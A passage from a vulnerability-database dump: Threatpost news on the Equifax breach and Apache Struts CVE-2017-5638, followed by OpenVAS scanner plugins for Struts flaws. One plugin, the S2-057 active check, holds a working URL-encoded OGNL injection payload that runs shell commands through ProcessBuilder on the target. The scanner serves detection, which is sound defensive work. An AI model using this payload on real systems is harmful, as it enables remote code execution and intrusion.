talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, 